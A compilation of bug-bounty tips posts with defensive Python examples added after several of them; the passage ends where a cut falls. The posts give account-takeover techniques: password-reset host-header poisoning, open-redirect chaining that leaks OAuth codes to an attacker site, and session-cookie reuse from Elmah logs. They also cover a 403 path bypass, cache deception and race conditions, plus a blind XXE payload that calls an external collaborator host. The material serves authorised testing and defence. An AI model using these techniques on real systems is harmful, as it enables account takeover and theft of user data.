🤔Question of the day: What are the common vulnerabilities within the "Forgot Password" functionality?
Many users tend to overlook testing the "Forgot Password" feature of a target app. However, these functions are often susceptible to various issues. If exploited, these issues can lead to an account takeover, yielding bounties ranging from $750 to $7500, depending on the program.
Here are the common issues you should be on the lookout for:
1️⃣ Token and username parameter: Some target apps often generate a password reset link containing a token and a username parameter. In such cases, request a password reset link on your attacker account, navigate to it, and attempt to replace the "username" parameter with the victim's username. Try resetting the password using your token. This is frequently one of the most common issues I've encountered that leads to an Account Takeover (ATO).
2️⃣ Password reset poisoning: Request a password reset using the victim's account and alter the "Host" header of the request to https://attackercontrolledsite(.)com. If the target app is vulnerable, this will trigger an email to the victim with a password reset link pointing to your server (e.g., https://attackercontrolledsite(.)com?token=dsksdjsdjsdjdsjdsjsd). When the victim clicks on this link, you will receive the password reset token, paving the way for an ATO.
3️⃣ HTTP Parameter Pollution: When requesting a password reset, always attempt to pass multiple email parameters (e.g., email=victim@target(.)com&email=attacker@target(.)com). Depending on how the application's backend is set up, it may have different routines running on various servers to check validity and send emails. Consequently, it could inadvertently send the password reset link of victim@target(.)com to attacker@target(.)com.
4️⃣ None of the above worked? Fret not! We have many more scenarios that can be exploited, and we'll discuss them in our future tweets.
Takeaways: Never underestimate the importance of the password reset functionality, as issues in these areas can lead to lucrative payouts. Be creative and make sure to add these items to your checklist.
#CyberSecurityTips #SecurityTips #BugBountyTips #InfoSec #HackerOne #BugCrowd #portswigger #burpsuite
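The defender's counterpart to the three reset-flow issues in the post above, as an added example that is not part of the original post and not any real application's code: the token is bound to an account server-side (so a username parameter cannot re-target it), the reset link is built from a fixed base URL rather than the request's Host header, and a duplicated email parameter is rejected outright. The hostnames, the in-memory stores and the helper names are assumptions made for the demo.

```python
import secrets
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode

# Constructed configuration: the reset link is built from a fixed server-side
# base URL so that a spoofed Host header can never change where the token goes.
RESET_BASE_URL = "https://app.example.com/reset"

# Constructed in-memory stores standing in for the user table and token table.
USERS: Dict[str, dict] = {
    "victim@example.com": {"id": 1},
    "attacker@example.com": {"id": 2},
}
PENDING_TOKENS: Dict[str, int] = {}  # token -> id of the user it was issued for


def parse_reset_request(raw_body: str) -> str:
    """Return the single email from a form body; refuse parameter pollution."""
    params = parse_qs(raw_body, keep_blank_values=True)
    emails = params.get("email", [])
    if len(emails) != 1:
        # email=victim&email=attacker must never reach the mailer at all.
        raise ValueError("exactly one email parameter is required")
    return emails[0].strip().lower()


def issue_reset_link(raw_body: str, host_header: str) -> Optional[str]:
    """Create a single-use reset link bound to the requested account.

    host_header is accepted only to make the point that it is ignored.
    Returns None for unknown accounts; a real handler would still answer
    with the same generic message to avoid account enumeration.
    """
    del host_header  # deliberately unused: never build links from the request Host
    email = parse_reset_request(raw_body)
    user = USERS.get(email)
    if user is None:
        return None
    token = secrets.token_urlsafe(32)
    PENDING_TOKENS[token] = user["id"]  # the account identity comes from this binding only
    return f"{RESET_BASE_URL}?{urlencode({'token': token})}"


def consume_reset(token: str, claimed_username: Optional[str] = None) -> Optional[int]:
    """Resolve a token to the account it was issued for and invalidate it.

    A username sent alongside the token never selects the account: if it does
    not match the account the token is bound to, the request is rejected.
    """
    user_id = PENDING_TOKENS.pop(token, None)  # single use: gone after one attempt
    if user_id is None:
        return None
    if claimed_username is not None:
        claimed = USERS.get(claimed_username.strip().lower())
        if claimed is None or claimed["id"] != user_id:
            return None
    return user_id
```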
Bug Bounty Tips: Finding additional targets connected to your widescope target.
Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.? Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag.
Here's how to access this valuable data:
1️⃣ You must login to builtwith.com/
2️⃣ Visit builtwith.com/relationships/…
You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets.
#BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️
Bug Bounty Tips💰: Easy $2000 bounty via enabled "PUT" method!
Here’s the nuclei template I used to identify this vulnerability: 🔗 github.com/projectdiscovery/…
The key question: If it’s a public nuclei template, why wasn’t it flagged as a duplicate, and how come no one else found it?
Here’s the difference: Most people run default nuclei templates only on root domains/subdomains. However, certain templates (like this one) might make sense to run on all directories of a target as there could be certain directories configured to accept/allow "PUT" requests.
What I did differently:
1️⃣ Collected all target paths using tools like Katana and ffuf for path fuzzing.
2️⃣ Ran the relevant nuclei template on these paths/directories rather than just the root.
The result? This approach uncovered a valid bug missed by others.
🚨Takeaway: Not all findings need to be unique—sometimes, it’s about using the right tools in the right way. Review nuclei templates and identify those that might make sense to run on all paths of your target.
#BugBountyTips #HackerOne #BugCrowd #Nuclei #CyberSecurity #Recon #OSINT
🤫 Unveiling a Hidden Technique: Bypassing 403 Access Denied Resources 🚀
Have you ever been frustrated by a 403 error on a specific web resource while others remain accessible? 🔒 Well, here's a secret you might find intriguing! Some websites use custom rules that rely on poorly crafted path-blocking to enforce restrictions, and we've discovered a clever way to bypass them. 🕵️‍♂️
Let's take an example: imagine you're trying to access https://target/api/admin/users/123, but it's blacklisted and shows a 403 access denied error. However, in most cases the underlying endpoint is actually vulnerable to an IDOR if you can actually get past these restrictions.
To bypass this protection - You can try appending a fake path like https://target/api/fakepath/..%2f/admin/fakepath/..%2f/users/123. This technique tricks the server into thinking you're not trying to reach https://target/api/admin/users/123. When it successfully bypasses the poorly designed custom rule meant to prevent access, the outcome depends on how the backend interprets ..%2f. In some cases, it might end up being treated as https://target/api/admin/users/123, granting you unauthorized access to protected resources! 🛡️
Deceive the Web Application Firewall (WAF) or Servers, gain access to restricted resources, and potentially earn handsome bounties! 💰
🚀Lesson: Always remember to explore different techniques for breaking through these restrictions. There are numerous secrets waiting to be uncovered! 🔐
#CyberSecurity #Bypass403 #Hacking #HackerOne #BugCrowd #bugBountyTips #SecurityTips
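Why the rule in the post above fails and how to fix it, as an added example (not the post's code): a blocklist that matches the raw request path is compared with one that first percent-decodes and normalises the path, so the `fakepath/..%2f` form resolves to the same `/api/admin/` prefix the backend will route on. The protected prefix and sample paths are constructed for the demo.

```python
import posixpath
from urllib.parse import unquote

# Constructed rule: anything under /api/admin/ requires the admin role.
PROTECTED_PREFIX = "/api/admin/"


def naive_is_protected(raw_path: str) -> bool:
    """The weak check from the post: a prefix match on the raw, undecoded path."""
    return raw_path.startswith(PROTECTED_PREFIX)


def canonicalize_path(raw_path: str) -> str:
    """Reduce a request path to the form the backend will actually route on.

    Steps: drop the query string, percent-decode until stable (catches %252f
    style double encoding, with a bound so a pathological input cannot loop),
    treat backslashes as separators, then collapse '.', '..' and '//'.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    # normpath resolves 'fakepath/..' to nothing and squeezes repeated slashes;
    # the leading '/' keeps '..' from escaping above the root.
    return posixpath.normpath("/" + path.lstrip("/"))


def hardened_is_protected(raw_path: str) -> bool:
    """Apply the same rule, but to the canonical path, so the decision
    matches what the backend will serve."""
    return canonicalize_path(raw_path).startswith(PROTECTED_PREFIX)
```

The caveat the post itself raises still applies: the canonicalisation must mirror the backend's own interpretation of `..%2f`, which is why the authorisation check belongs in the application rather than in a front-end path filter.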
🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑
I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting in bounties ranging from $750 to $5000, depending on the program. Open redirects can be chained with legitimate redirects, allowing attackers to exfiltrate OAuth codes and tokens for potential account takeovers.
Here's the quick breakdown:
(1) Find a low-severity open redirect, for example: example.com/next-step?url=at….
(2) Look for site login functionality on core domains or subdomains. Assuming login is integrated with Auth0 or another equivalent service provider at login.example.com. In such cases, a valid redirect would usually look something like login.example.com?redirect_u…
(3) You can now chain the vulnerable open redirect identified in step 1 with the login page and still be able to exfiltrate the login code in most cases. For example, you could craft a URI like login.example.com?redirect_u…
When a victim navigates to the above link and logs in, upon successful login, it will redirect them in this flow to the attacker controlled site: login.example.com -> (First Redirect) example.com/next-step?code=:…: -> (Second Redirect) attackersite.com?code=:login…:
As a result, this ultimately leads to the leakage of Auth0 or other equivalent codes/tokens to an attacker-controlled server, resulting in an ATO.
Common mistakes: Reporting open redirects as simple issues without escalating their impact. Don't underestimate their potential. Always look for ways to level up! 💡
#BugBounty #InfoSec #openredirect #cybersecurity #bugbountytips #hackerone #bugcrowd #securitytips #questionoftheday
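Two checks that break the chain described above, as an added example (not the post's code): the application's own redirect parameter is validated against a host allow-list (handling the scheme-less, protocol-relative and `user@host` forms that trip naive checks), and the login provider matches `redirect_uri` exactly against registered values rather than by prefix, so a `?url=` variant of a registered path is not accepted. The allow-listed hosts and registered URIs are assumptions made for the demo.

```python
from typing import Iterable
from urllib.parse import urlsplit

# Constructed allow-list for the application's own post-login redirects.
ALLOWED_REDIRECT_HOSTS = {"example.com", "www.example.com"}


def is_safe_redirect(target: str, allowed_hosts: Iterable[str] = ALLOWED_REDIRECT_HOSTS) -> bool:
    """Allow a same-site relative path or an https URL to an allow-listed host."""
    if not target or any(ch in target for ch in "\r\n\t\x00"):
        return False  # control characters invite header injection and parser confusion
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: exactly one leading slash. "//host" is protocol-relative and
        # "/\host" is treated the same way by browsers, so both are rejected.
        return target.startswith("/") and not target.startswith(("//", "/\\"))
    if parts.scheme.lower() != "https":
        return False  # rejects http://, javascript:, data: and similar
    if parts.username is not None or parts.password is not None:
        return False  # https://example.com@attacker.example resolves to the attacker
    host = (parts.hostname or "").rstrip(".")  # hostname is already lower-cased
    return host in {h.lower() for h in allowed_hosts}


def oauth_redirect_uri_allowed(registered: Iterable[str], candidate: str) -> bool:
    """Provider-side check: redirect_uri must equal a registered URI component-wise.

    Exact matching (no prefix or wildcard rules) is what stops the double
    redirect in the post: even if a registered path elsewhere hosts an open
    redirect, an arbitrary ?url=... variant of a registered URI is refused.
    """
    cand = urlsplit(candidate)
    if cand.fragment != "":
        return False
    for reg in registered:
        r = urlsplit(reg)
        if (r.scheme, r.netloc, r.path, r.query) == (cand.scheme, cand.netloc, cand.path, cand.query):
            return True
    return False
```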
🔍 Question of the day: What automated checks can you perform after subdomain reconnaissance?🌐
Many people gather subdomains but struggle with what to do next with this dataset. Here are some automated checks you can conduct on these subdomains:
🌀 Subdomain Takeovers: Verify subdomain takeovers using tools like Nuclei and dnsReaper.
📂 Passive Source URLs: Gather as many URLs as possible from passive sources such as Wayback Machine and AlienVault. Consider using Waymore, an excellent tool for this purpose.
📝 Active Source URLs: Collect active URLs and parameters using Katana.
🔍 Custom Nuclei Templates: Develop your custom Nuclei templates to check for SQL injection (SQLI), cross-site scripting (XSS), server-side template injection (SSTI), etc. For example, look for SQLI in User-Agent and Referer headers, and XSS in parameters and URIs. Apply these templates to all collected URLs.
🔐 Check for Leaked Secrets: Utilize Nuclei templates to search for leaked credentials or secrets on these URLs.
🧩 JS Files and Monitoring: Extract all JS files from passive and active sources and identify APIs using tools like LinkFinder, JSLuice, and GAP. Automate crawling these APIs and create custom regex patterns to detect sensitive data or large responses. Apply a similar approach to identify hard-coded credentials.
🚀 Directory Fuzzing: Employ wordlists from Assetnote for directory fuzzing on these subdomains to uncover hidden files and directories. Filter out HTTP status codes like 200 and 301, then investigate further.
🔎 Automated Parameter Mining: Develop custom scripts to automatically discover hidden parameters on collected URLs. Once identified, run these through your custom Nuclei templates again.
🌟 Identify Interesting Assets: Use title, keywords in response bodies, knowledge of vulnerable products, and more to identify intriguing assets for manual review.
There are many additional ideas you can build upon to enhance your automation capabilities. Stay tuned for more insights! 🐛💰
#BugBounty #Automation #InfoSec #BugBountyTips #HackerOne #BugCrowd #SecurityTips
Scored a $5,000 bounty today. I’ve only started messing around with AI in my workflow THIS week. Normally I’d spend hours trying to escalate certain bugs - the kind that takes a lot of digging and escalation and I'd usually end up moving away from it considering the ROI. But this time I let AI handle some of the painful parts of the manual escalation process and it actually helped me efficiently escalate the bug. Ended up turning what would’ve been a tiny payout into a $5000 bounty. Now I’ve basically got Burp Suite on one screen, AI on the other, and it feels like cheating (in a good way). This might actually change how I hunt moving forward with respect to escalating stuff to avoid manual work wherever possible. 🚀
🔒Bug Bounty Tips - Here's how I earned a $6000 Bounty by escalating a simple Elmah File Disclosure Issue 🔒
💡 If you haven't already, add /elmah and /elmah.axd to your wordlist! These paths often lead to Elmah file disclosures, a finding many researchers report as Low/Medium severity (P3/P4). Here’s how I used Elmah log disclosure to escalate and achieve internal employee account takeovers in three separate cases.
🕵️ How to Leverage Elmah Disclosures for Account Takeover:
1️⃣ Locate the Elmah File: Found an Elmah file on your target? Open it by navigating to /elmah or /elmah.axd.
2️⃣ View Error Logs: Click "Details" on any log entry to reveal the full HTTP request, including headers.
3️⃣ Look for Session Cookies: The details may expose session cookies or internal routes tied to authenticated users.
4️⃣ Attempt Account Access: Use the disclosed session cookies on a request to the target, e.g., http://example[.]com. In many cases, this results in access to an internal employee or administrative accounts!
⚠️ Bonus Tip: Sometimes, Elmah files are set to delete logs hourly. If the logs are empty, don’t give up yet! Monitor the Elmah file for a few hours; an error log with authenticated user session cookies is likely to show up eventually.
#HackerOne #Bugcrowd #BugBountyTips #YesWeHack #Intigriti #BugBounty
🔍Question of the Day: Where to hunt for XXE (XML External Entity) vulnerabilities?
XXEs are lurking in unexpected places! When it comes to identifying XXE issues, you'll find these vulnerabilities almost everywhere. Here's my top 5 list of features and areas you should keep an eye on when testing for XXE issues:
1️⃣ XML APIs - Test target apps and see if XML is being used or alternatively try replacing content-type: application/json with application/xml or text/xml with an XML body
2️⃣ SOAP APIs - Working on a target app that supports SOAP? Test for XXE payloads
3️⃣ SAML Authentication - Test XXE on the SAML flow
4️⃣ HTML parsing (e.g., converting HTML to some other file type)
5️⃣ SVG File Upload - Assuming that the app supports SVG file upload and parses SVG. You can try this payload gist.github.com/jakekarnes42…
These areas often conceal potential XXE vulnerabilities waiting to be uncovered. The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
<?xml version="1.0" ?> <!DOCTYPE root [ <!ENTITY % ext SYSTEM "http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext; ]>
📦 For a plethora of payloads and examples, explore the XXE Injection cheat sheet at 🔗 github.com/swisskyrepo/Paylo….
Stay vigilant! XXEs might be hiding where you least expect them. Happy hunting! 🕵️‍♂️💡
#BugBounty #Cybersecurity #XXE #Vulnerabilities #HackingTips #HackerOne #BugCrowd #BugBountyTips
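On the receiving side of the five areas listed above, the common denominator is a parser that honours a DTD. As an added example (not from the post or the linked cheat sheet), this guard refuses any document carrying a DOCTYPE or ENTITY declaration before the standard-library parser sees it, including the blind out-of-band probe quoted in the post and a UTF-16 re-encoding of it; the sample documents are constructed.

```python
import re
import xml.etree.ElementTree as ET

# A DOCTYPE or ENTITY declaration in the prologue is the precondition for every
# XXE variant, including the blind out-of-band probe shown in the post.
_DECL_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# The probe from the post (hostname defanged as in the post), kept here only
# as a test input for the guard.
SAMPLE_BLIND_XXE = (
    b'<?xml version="1.0" ?><!DOCTYPE root [ <!ENTITY % ext SYSTEM '
    b'"http://BURP_COLLABORATOR[.]burpcollaborator[.]net/x"> %ext; ]><root/>'
)


class UnsafeXMLError(ValueError):
    """Raised when a document carries a DTD and therefore must not be parsed."""


def to_utf8(data) -> bytes:
    """Normalise input to UTF-8 bytes so a UTF-16 BOM-prefixed document
    cannot slip its declarations past a byte-level scan."""
    if isinstance(data, str):
        return data.encode("utf-8")
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16").encode("utf-8")
    return data


def safe_parse(data) -> ET.Element:
    """Parse XML only if it carries no DTD; fail closed otherwise.

    A DOCTYPE inside a comment would also be rejected, which is the
    acceptable direction for a false positive here.
    """
    raw = to_utf8(data)
    if _DECL_RE.search(raw):
        raise UnsafeXMLError("DOCTYPE/ENTITY declarations are not accepted")
    # With no DTD present there are no entities for expat to resolve or expand.
    return ET.fromstring(raw)


def is_safe_xml(data) -> bool:
    """Convenience wrapper: True only for well-formed, DTD-free input."""
    try:
        safe_parse(data)
        return True
    except (UnsafeXMLError, ET.ParseError):
        return False
```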
🎯 Question of the Day: How do you approach a new bug bounty target? 🕵️‍♂️
Starting fresh on a bug bounty program? Here are my top 5 essential checks to kick off your hunt for vulnerabilities, but keep in mind that the actual checklist is much more extensive.
🔍 Top 5 Manual Checks:
1️⃣ Login Flow Testing - Check authentication processes for issues like OTP rate limiting, password reset vulnerabilities, Account Takeovers (ATOs), and XSS ATOs.
2️⃣ CSRF Validation - Verify GET/POST methods, form submissions, and the implementation of CSRF tokens and test for CSRF Issues on all sensitive endpoints
3️⃣ IDOR Investigations - Detect requests accepting IDs or UUIDs; create two accounts, and meticulously test for Insecure Direct Object Reference (IDOR) vulnerabilities.
4️⃣ Manual XSS Sweeps - Personally inspect pages for GET/POST-based XSS flaws (Reflected, Stored, DOM-based, etc.). Use Burp extensions like Param Miner to uncover hidden parameters and test for XSS vulnerabilities.
5️⃣ RBAC Assessments - If the application features multiple roles, assess access control issues to potentially elevate privileges.
Automated Scans:
1️⃣ Subdomain Takeovers - Automatically search for subdomain takeover possibilities.
2️⃣ XSS, SQLI, SSTI, OR, etc. Scans - Leverage automated tools to detect common vulnerabilities on your active/passive crawling dataset.
3️⃣ CVE Scanning - Scan for known Common Vulnerabilities and Exposures (CVEs).
4️⃣ Associated Asset Scanning - Identify and scan associated assets, particularly if the target has a broad scope.
5️⃣ Common Misconfigurations - Scan using nuclei templates for common misconfigurations
Hybrid Approach (Mix of Manual and Automated):
1️⃣ Automation Leads Exploration - Investigate promising leads from automation, such as intriguing API endpoints or parameters from active/passive sources.
2️⃣ Secrets Hunt - Search for hardcoded secrets in JavaScript files, utilize GitHub dorks, Google dorks, and Dehashed.
3️⃣ API Endpoint Discovery - Extract interesting API endpoints from pages, JavaScript files, Swagger documentation, etc.
4️⃣ Directory Fuzzing - Fuzz directories to uncover hidden files or folders, then manually investigate potential leads.
5️⃣ Keyword-Based Targeting - Use specific keywords (e.g., Login, Register, Admin, Dashboard) found during automation to narrow your focus.
📚 Takeaway: Diversify your approach and combine manual and automated techniques to maximize your bug bounty hunting success. Each target is unique, so adapt your strategy accordingly.
🚀 Seeking more tips and insights? Stay tuned for future tweets and discussions. Happy hunting! 💰🐛
#BugBounty #Cybersecurity #HackerOne #BugCrowd #Infosec #Bugbountytips
Bug Bounty Tip: Keeping it simple & consistent
Over time, I’ve realized that overly complicated automation in bug bounty isn’t as exciting or rewarding—at least not for me. Instead of trying to automate everything under the sun, I’ve found that focused, consistent recon on core targets works much better.
Here’s what’s been working for me:
✅ Daily Recon on Favorite Targets – Just simple, routine checks on a limited set of targets around 10-15 wide scope programs.
✅ Regular Scans & Fuzzing – Run top CVE templates, VHost checks, and other essential tests using ffuf, katana, nuclei, jsluice, etc.
✅ Subdomain Takeover Monitoring – One of the few things worth running across everything.
✅ 0-Day Research & Collabs – If you’re working on new research or working with someone else, spread these checks across multiple assets.
For the past 1-2 months, I’ve mostly been chilling, only reporting leads from automation 80-90% of the time, i.e., it still requires me to manually look at it and escalate the bug, and that still seems to be resulting in 8-10 reports per month and $40K-$50K in bounties on average.
The key takeaway? Simplicity, consistency, and strategic targeting matter way more than bloated automation. Keep refining your workflow and focus on what actually works.
Bug Bounty Tips: Account Hijacking via Invite Flows💰
I've reported 10+ similar issues involving these scenarios, securing me some quick victories! People often overlook straightforward logical issues, rushing to tackle the complex ones. However, these issues are deceptively simple and can yield substantial bounties!
Here are the prerequisites that must be met to proceed with these attacks:
1️⃣ Ensure your target app supports inviting team members within the application.
2️⃣ Verify that your target app allows account signup without email verification, or identify an email verification bypass vulnerability.
Here's my approach to identifying and reporting these issues:
1️⃣ Log in to your account and invite a new team member, e.g., testaccount@example.com (Ensure this account isn't registered on the platform).
2️⃣ This typically sends an invitation link to testaccount@example.com to sign up and join the team by accepting the invite.
3️⃣ To test if the target app is vulnerable, disregard the invitation email link and attempt to sign up for an account directly using testaccount@example.com, assuming no email verification is required on the target app or that you've identified an email verification bypass.
4️⃣ Once logged in to the target app, you'll likely discover an invitation that enables you to accept it on behalf of the victim, granting unauthorized access to the team with the assigned role (e.g., admin, team, etc.), resulting in a significant security impact.
The issue here is that anyone can sign up using an email that hasn't been registered on the platform yet but is awaiting a pending invitation, possibly with an admin role or another role in an organization. This invitation can be accepted once you've logged in, allowing the attacker to hijack it and gain unauthorized access to the organization.
Takeaways: Don't underestimate the simplicity; these quick wins are accessible to anyone and can earn you some rapid $$$! 💡💸
#BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #BugBountyTips #InfoSec
Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀
Here's a valuable list of sources to track all bug bounty platforms and assets:
1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 github.com/projectdiscovery/…
2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 github.com/arkadiyt/bounty-t…
3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 github.com/sw33tLie/bbscope
What can you do with this data? Here are some ideas:
1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email.
2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks.
3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates. 🕵️‍♂️
Follow these accounts for real-time scope updates:
1️⃣ h1disclosed - Twitter: 🔗 nitter.app/disclosedh1 - Get notifications on program launches and disclosed reports.
2️⃣ bbradar - Track all bug bounty programs at: 🔗 bbradar.io/
3️⃣ inbbupdates - Twitter: 🔗 nitter.app/inbbupdates - Receive notifications on scope changes.
This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒
#hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡
🔐 Show & Tell: Uncovering a Simple Web Cache Deception Vulnerability That Paid Off 💰💰
Cache Deception issues might seem complex, but with the right approach, they're straightforward and can lead to generous rewards, ranging from $1,000 to $10,000, depending on the impact. Today, I'll share how I discovered a basic web cache deception issue that allowed me to access users' PII data through caching, resulting in a "High" payout.
Here's my step-by-step approach:
1️⃣ Got Invited to a private program - My first move was to inspect the Request/Response headers for common misconfigurations. I immediately spotted common cache headers like Server-Timing, CF-Cache-Status, X-Cache, X-CDN, etc.
2️⃣ Identifying interesting cache headers - Once I pinpointed these headers, the next step involved analyzing the application's behavior. I sent sample endpoints/APIs to Repeater and appended tricky paths to the URIs. For example, if the path "https://target(.)com/api/v1/users" returned sensitive PII, I tried appending variations like "https://target(.)com/api/v1/users/self.css" and "https://target(.)com/api/v1/users/self/.js" to observe if there was a cacheable response.
3️⃣ A straightforward cache issue - In my case, it was a simple cache issue as the endpoints returned HTTP 200 with the appended suffix and response with a cache HIT :) The attack scenario involved crafting and sending a malicious link, "https://target(.)com/api/v1/users/self/.js?cachebuster" to a victim. When the victim, already logged in, opened the link, it led to caching the victim's PII data due to the misconfiguration.
4️⃣ Exploiting the cache - When navigating to "https://target(.)com/api/v1/users/self/.js?cachebuster" as an attacker using Chrome Incognito, the cached response was found to contain the victim's PII data from "/api/v1/users/self/", resulting in a risk of sensitive information disclosure.
While this was a relatively straightforward scenario, more complex techniques can help escalate these Issues to an ATO by chaining CSRF, XSS, etc., potentially requiring parameter mining and/or bypassing limitations. We'll look into these examples in future tweets!
Takeaway: Always keep an eye out for cacheable response headers and ensure this vulnerability class is part of your checklist. If you find a cacheable response but can't exploit it, feel free to drop a message for collaboration. 😊
Thanks for reading! #HackerOne #BugCrowd #SecurityTips #BugBountyTips #Security #WebCache #BugBounty 💻🔒
Bug Bounty Alert: Sensitive token disclosure. Hurry and add /auth.json to your wordlist Be quick to grab some nice wins :) Here's the new nuclei template by DhiyaneshDk - raw.githubusercontent.com/pr…
Bug Bounty Tips: Learn from My Early Mistakes 🚫
In my bug bounty journey, I've made several mistakes that I hope you can avoid. Here are the top 5 lessons:
1️⃣ Program Diversification: Imagine you've found a goldmine program with a stack of issues to keep you busy for months. It's tempting to focus all your efforts there, but why just stick to one program? Instead, seize this opportunity to diversify. Find 1-2 backup programs to hunt on. You're motivated and can handle multiple programs at once. This approach builds multiple income streams, reducing your reliance on a single favorite program. The strategy would be to report 2-3 issues on your favorite program and then hop on to explore new programs to find issues there for future readiness. Can't find any issues? Time to buy some more motivation by reporting an issue on your favorite program and then keep jumping back and forth.
2️⃣ Comfort Zone Trap: Landing a big bounty or a couple of them might make you want to kick back and relax for the rest of the month. However, if you're just starting out, it's crucial not to get too comfortable. I learned this the hard way. Staying in your comfort zone can stunt your growth. Instead, aim to double your monthly targets. This strategy ensures consistent progress and mitigates the impact of lean months.
3️⃣ XSS to ATO Escalation: Reporting XSS issues is great, but don't stop there. One of my biggest regrets is not escalating XSS to Account Takeover (ATO) issues. I potentially missed out on substantial rewards over 100k+. Some programs are willing to pay generously for XSS escalations to ATO up to $10k-30k. If you're unsure how to escalate, feel free to reach out to me for collaboration.
4️⃣ Automation Neglect: I made the mistake of ignoring automation for over two years. If you're not using any automation, you're likely missing out on numerous opportunities. Even a basic automation setup can help you save time and uncover issues that manual testing might overlook.
5️⃣ Balancing Automation: While automation is a valuable tool, it shouldn't be your sole reliance. Bug bounty hunting isn't a guaranteed source of free money. Even with automation, it's crucial to maintain a hybrid approach. This means investigating the leads generated by your automated tools thoroughly. A well-rounded manual testing methodology is essential for success.
Avoid these early mistakes, and you'll be better equipped for your bug bounty journey! 🚀💰
#BugBounty #InfoSec #SecurityTips #HackerOne #BugCrowd #Cybersecurity
🚀Question of the day: How to Identify & exploit race condition Issues? 🏁
I've reported 30+ race condition Issues, and it's been quite the profitable journey! 🤑 Despite their prevalence, these vulnerabilities often fly under the radar.
📚 Real-World Scenarios: Let's dive into some real-world examples where race condition Issues can be a goldmine:
1️⃣ Daily Bonus Claim: Beat the "once a day" limit via a race condition attack to claim multiple bonuses.
2️⃣ Limited Seats: Exceed the allocated seats per account by inviting more users than allowed.
3️⃣ Order Cancellation: Exploit race condition Issues on order cancellations to receive multiple refunds for the same order.
4️⃣ License Limitations: Overcome app restrictions that limit actions per license through a race condition attack.
5️⃣ Daily Action Limit: If there's a daily limit on an activity, use a race condition attack to show that the limit can be bypassed.
Exploitation in Action:
1️⃣🔍 Identifying Race Condition Vulnerabilities: Start by identifying functions that are restricted by limitations. The examples I've mentioned are just the tip of the iceberg, and there could be similar functions within your target.
2️⃣ Intercept: Use tools like Burp Suite to intercept and send the request to Turbo Intruder
3️⃣ Send Multiple Payloads: Send 30-50 payloads within a short timeframe. This overload can lead to unexpected outcomes as the system struggles to handle concurrent requests.
Race conditions are a treasure of opportunities, and the potential for profit is substantial.
Takeaways: Don't underestimate the power of race condition Issues. Include them in your checklist for bug hunting, and you might just land some lucrative bounties. Remember, these principles apply not only to traditional web applications but also to the exciting realm of Web3 security. 🌐💰
#CyberSecurity #BugBounty #HackerOne #bugbountytips #securitytips #bugcrowd
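The "daily bonus" scenario above from the server's side, as an added example (not the post's code): a check-then-act handler that a burst of concurrent requests can slip past, beside one that folds the limit check into a single conditional UPDATE so the database serialises it. SQLite and threads stand in for the backend and the burst; the table, user ids and day strings are constructed, and the limit is a parameter so the same code covers the per-license and per-seat cases too.

```python
import os
import sqlite3
import tempfile
import threading
import time


def new_db() -> str:
    """Create a throwaway SQLite file with the constructed bonus_claims table."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE bonus_claims ("
        " user_id INTEGER NOT NULL, day TEXT NOT NULL,"
        " claims INTEGER NOT NULL DEFAULT 0,"
        " PRIMARY KEY (user_id, day))"
    )
    conn.commit()
    conn.close()
    return path


def _connect(path: str) -> sqlite3.Connection:
    # Autocommit mode: each statement is its own transaction, serialised by the
    # database lock; the timeout makes contending writers wait rather than fail.
    return sqlite3.connect(path, timeout=30, isolation_level=None)


def claim_naive(path: str, user_id: int, day: str, limit: int = 1) -> bool:
    """Check-then-act: the gap between the SELECT and the UPDATE is the race."""
    conn = _connect(path)
    try:
        conn.execute("INSERT OR IGNORE INTO bonus_claims (user_id, day) VALUES (?, ?)", (user_id, day))
        (claims,) = conn.execute(
            "SELECT claims FROM bonus_claims WHERE user_id = ? AND day = ?", (user_id, day)
        ).fetchone()
        if claims >= limit:
            return False
        time.sleep(0.005)  # stands in for the work a real handler does before writing
        conn.execute("UPDATE bonus_claims SET claims = claims + 1 WHERE user_id = ? AND day = ?", (user_id, day))
        return True
    finally:
        conn.close()


def claim_atomic(path: str, user_id: int, day: str, limit: int = 1) -> bool:
    """One conditional UPDATE: check and increment happen under the same lock,
    so concurrent requests cannot all observe 'claims < limit'."""
    conn = _connect(path)
    try:
        conn.execute("INSERT OR IGNORE INTO bonus_claims (user_id, day) VALUES (?, ?)", (user_id, day))
        cur = conn.execute(
            "UPDATE bonus_claims SET claims = claims + 1"
            " WHERE user_id = ? AND day = ? AND claims < ?",
            (user_id, day, limit),
        )
        return cur.rowcount == 1  # 0 rows touched means the limit was already reached
    finally:
        conn.close()


def run_burst(path: str, claim_fn, user_id: int, day: str, requests: int = 30, limit: int = 1) -> int:
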